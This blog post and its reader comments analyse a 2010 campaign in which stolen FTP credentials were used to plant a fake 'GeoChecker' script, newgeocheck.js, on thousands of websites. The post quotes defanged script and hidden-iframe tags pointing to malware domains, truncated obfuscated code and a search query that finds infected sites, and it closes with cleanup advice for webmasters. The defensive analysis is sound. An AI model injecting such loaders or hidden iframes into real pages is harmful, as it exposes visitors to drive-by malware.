msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

NewGeoCheck.js and Malicious AddThiss .net Iframe

   19 May 10   Filed in Website exploits

Yesterday, I checked one site that had the following text on its Google Safe Browsing diagnostic page:

Malicious software is hosted on 1 domain(s), including addthiss .net/.

Unmask Parasites didn’t detect anything suspicious but a quick manual check revealed the following script tag right after the <body> tag in every web page:

<sc ript type="text/javascript" src="newgeocheck.js"></script>

(Unmask Parasites doesn’t check .js file, so no wonder it couldn’t detect the source of the problem)

This script loaded an invisible iframe form addthiss .net.

<i frame width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" style="" src="hxxp://addthiss .net/ in.cgi?8"></iframe>

Here goes the real investigation…

The newgeocheck.js file looked strange. Hackers usually inject their malicious code into legitimate .js files or create their own .js files. However, in this case the file content looked like a code of some legitimate JS library (that called itself GeoChecker 2.0.1 ) with meaningful comments and variable names and at the same time it was 100% malicious.

// GeoChecker 2.0.1
// The current cookie code should be called first to ensure
// that it takes precedence over any other logic

var geocheck = true;
// assumes that the language is based on the Language Tags specification standard RFC2616 from W3C
// language-tag = primary-tag '-' sub-tag (e.g. en-US)
// primary-tag is an ISO-639 language abbreviation, sub-tag is an ISO-3166 country code

var secureNewgeoB;if(secureNewgeoB!='' && secureNewgeoB!='mIR'){secureNewgeoB='fKDE'};this.zAP=30722; ...

Well, I was puzzled and decided to check if there was a real JS library that uses a file with name newgeocheck.js. The results of the search contained only posts about similar hacks and … directory listings of improperly configured web sites.

Here’s the search that narrows down the results to hacked websites that allow directory listing (which is actually a security breach too) intitle:”Index of” newgeocheck.js (be careful, the sites can still be dangerous).

These search results helped me learn more about the attack.

Spread of the attack.

The search currently returns 500+ search results. At the same time Google Safe Browsing diagnostic page for addthiss .net reports 732 infected domains. Given that only about 40% of the sites in those search result are currently blacklisted and that the search only returned mis-configured sites, I can safely estimate that there are at least a couple of thousand infected domains. Maybe significantly more.

Dates

Many web servers are configured to display file dates on directory listing pages. Those dates for the newgeocheck.js file show that all site have been infected in the period between the end of March and the middle of this April.

Moreover, there seems to have been two waves of the attack. One around March 24-26, and the other around April 12-13 (Some search results show the March dates (cached), but when you visit the pages you see the April date).

Existing JS files

Directory listings also show that other .js files (those that existed before the attack) are also infected with the modification of the same obfuscated script. The scripts are injected at the very bottom of .js files and usually end with a comment like this //secured_20022002 (the number may be different)

Speculation about the attack vector

This is definitely not a vulnerability of some popular web application. The affected site are powered by various CMS’s and blog engines. Some websites are completely empty – you can see a lonely newgeocheck.js in an empty root directory.

At the same time this is not a server-wide or network-wide attack. The compromised sites are spread across many different IPs and networks.

On some sites I detected signs of other attacks that are known for using stolen FTP credentials (e.g. Gumblar).

I also noticed that several sites of the same owner may be infected. This usually happens when hackers use site credentials stolen from webmasters’ computers.

And while I don’t have any direct evidence (remember, I don’t have access to compromised sites and their logs), I’m almost sure that this attack used the FTP infection vector.

CountInfo .com

On some sites I found a modification of the “addthiss .net” attack. It doesn’t use the newgeocheck.js file and only injects a malicious script at the very bottom of existing .js files. The script loads the following invisible iframe from countinfo .com

<ifr ame width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" style="" src="hxxp://countinfo .com/ in.cgi?3"></ifr ame>

Both addthiss .net and countinfo .com domains point to the same IP: 109 .196 .143 .33 (VLine Ltd, Moscow).

Reverse IP lookup also revealed some alternative domain name: addthiss .cn, addthiss .com and addthiss .org – these domains are also know for distributing malware.

To webmasters

If Google blacklists your site and the diagnostic page mentions addthiss .net, you should scan your site for

  • newgeocheck.js files in all directories (and remove them)
  • malicious code in your existing .js files (and remove it)
  • <s cript type=”text/javascript” src=”newgeocheck.js”></script> string in your web pages (and remove it)

If you find the newgeocheck.js on you server – your site have been attacked and your FTP credentials have been stolen.

Start with you own computer. Thoroughly scan it for malware. Then change all site passwords and keep them secure (don’t save them in your FTP programs).

The next step is cleaning up your site. Usually the easiest way to do it is to remove everything and then restore the site from a fresh clean backup copy. This way you don’t have to process each file individually and won’t omit any malicious code on your server.

When the site is clean, you might need (if it is blacklisted by Google) to request a malware review via Google Webmaster Tools (Diagnostics -> Malware). You can find more information about how to deal with Google malware warnings here.

Have Your Say

If you know more about this attack, please share the details in the comments. Maybe you know other attacks that create .js file that mimic legitimate JavaScript libraries?

Your comments are welcome.

[Offtopic] This is my 100th post on this blog!

Related posts:

Reader's Comments (4)

  1. |

    Denis,

    As always, your research is invaluable to the Internet – nice job.

    We have seen this attack as well and in every case, we see the corresponding entries in the FTP logs showing that a stolen FTP account was used. We didn’t see a long list of login attempts with incorrect passwords just a straight login with a valid FTP account which leads us to believe that the password was stolen.

    We’ve also seen a second type of malscript in the newgeocheck.js file.

    It starts with:
    this.hB="";var geoCheck;this.secureF="secureF";var qPY;if(qPY!='rCheckO' && qPY!='checkSecureC'){qPY='rCheckO'};geoCheck="afabaea...

    It had the exact same comment section as the one you identified above, but the code was entirely different. However, it does still decode to the same iframe:

    Again, great research!

    • |

      Thanks Thomas,

      This confirmation is really important as it lets webmasters of compromised sites focus on the security issues of their own computers and protecting their site credentials.

  2. |

    I can confirm that this malware is placed on the accounts via stolen FTP credentials as well. I have come across a few of these over the past few days. A decode if one of the recent ones can be found here: http://jsunpack.jeek.org/dec/go?report=105b584bde1eb180d2aaa92d44d7e5cb9baae8cb

  3. |

    One more domain used by this attack
    freecheck .info